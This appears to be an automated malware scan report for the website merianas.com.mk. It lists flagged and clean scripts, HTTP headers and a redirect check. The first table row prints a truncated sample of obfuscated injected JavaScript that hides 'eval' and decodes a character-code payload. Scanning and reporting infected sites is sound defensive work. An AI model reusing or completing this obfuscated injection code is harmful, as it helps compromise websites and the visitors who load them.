Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=merianas.com.mk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://merianas.com.mk/ | 503 Service Temporarily Unavailable Content-Length: 5912 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String.fromCharCode;zz=3;try{document.body/=2}catch(gdsgd){v="va"+"l";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:window}.a;vv="e"+v;}}e=w[vv];if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97,113,30,111,120,112,97,111,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,12,8,32,31,30,32,110,1 Antivirus reports:
| ||
http://merianas.com.mk/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://merianas.com.mk/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://merianas.com.mk/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://merianas.com.mk/media/system/js/modal.js | 200 OK Content-Length: 9732 Content-Type: application/javascript | clean |
http://merianas.com.mk/media/k2/assets/js/jquery-1.6.3.min.js | 200 OK Content-Length: 91626 Content-Type: application/javascript | clean |
http://merianas.com.mk/components/com_k2/js/k2.js | 200 OK Content-Length: 6367 Content-Type: application/javascript | clean |
http://merianas.com.mk/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://merianas.com.mk/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: merianas.com.mk
Result:
HTTP/1.1 503 Service Temporarily Unavailable
Cache-Control: no-cache
Connection: close
Date: Fri, 30 May 2014 17:56:10 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b52197e74110d515341293a32bf6c872=d37935d1494b2094cc978a1b4510f3c2; path=/
GET / HTTP/1.1
Host: merianas.com.mk
Result:
HTTP/1.1 503 Service Temporarily Unavailable
Cache-Control: no-cache
Connection: close
Date: Fri, 30 May 2014 17:56:10 GMT
Pragma: no-cache
Server: nginx/1.6.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: b52197e74110d515341293a32bf6c872=d37935d1494b2094cc978a1b4510f3c2; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: merianas.com.mk
Referer: http://www.google.com/search?q=merianas.com.mk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: merianas.com.mk
Referer: http://www.google.com/search?q=merianas.com.mk
Result:
The result is similar to the first query. There are no suspicious redirects found.